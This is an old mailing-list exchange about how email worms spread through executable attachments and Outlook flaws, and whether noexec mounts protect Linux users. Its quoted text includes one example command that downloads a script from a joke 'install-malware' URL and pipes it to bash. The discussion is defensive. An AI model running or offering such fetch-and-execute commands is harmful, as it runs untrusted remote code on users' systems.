On Thu, 6 Feb 2003, John Summerfield wrote:

> On Thu, 6 Feb 2003, Tzafrir Cohen wrote:
>
> > > machines is fairly slight. Consider;
> > > Most Windows viruses spread by using Lookout Express and other office
> > > product APIs. A great way of reducing your risk of infection on Windows
> > > is to use some other email client and office suite.
> >
> > Or to patch them with the latest security patches!
>
> That certainly helps, but there are so many....

Well, at least 90% of the "infected" emails nowadays (actually: I guess that
more than 99%) are caused by worms with a very simple infecting mechanism:

* An executable attachment (but a user should know better than to execute
  such an attachment, right?)
* Abusing one or two holes in Outlook (for which a patch has been available
  for quite a while now) that allow an attacker to cause the reader to
  execute an attachment automatically.

And still, instead of verifying that their software is up-to-date, people
buy "anti-virus" products. (Yes, this is "instead". Not "in addition".)

>
> >
> > Another problem is that when you "open" an attachment, you can't know in
> > advance if it will be a harmless image, or an executable (that may be a
> > worm, even if you are not a privileged user)
> >
> > The more I look at evolution and kmail, the more they look like outlook's
> > interface with this exact design flaw.
>
> Test them.
>
> I tried sending myself a shell script as an attachment to myself, and
> tried it with kmail.
>
> It distressed me by trying to run it, but it didn't have the execute
> permissions.

Wow! Why did it try to execute it in the first place?

kmail gives you the same alarming warning for a shell script as it gives you
for a harmless image. Users will learn to ignore them.

>
> On Linux, if your users' home directories are in /home, if /tmp and
> /var/tmp are separately-mounted filesystems, you can mount them with the
> noexec option and so prevent users from running their own programs.
>
> However, it won't prevent these:
> . some-nasty
> lynx -dump http://www.microsoft.com/install-malware | bash

This creates a temporary file in /tmp (or whatever) and executes it, to the
best of my knowledge.

But I believe that such a limitation will break many other programs.

--
Tzafrir Cohen
mailto:[EMAIL PROTECTED]
http://www.technion.ac.il/~tzafrir
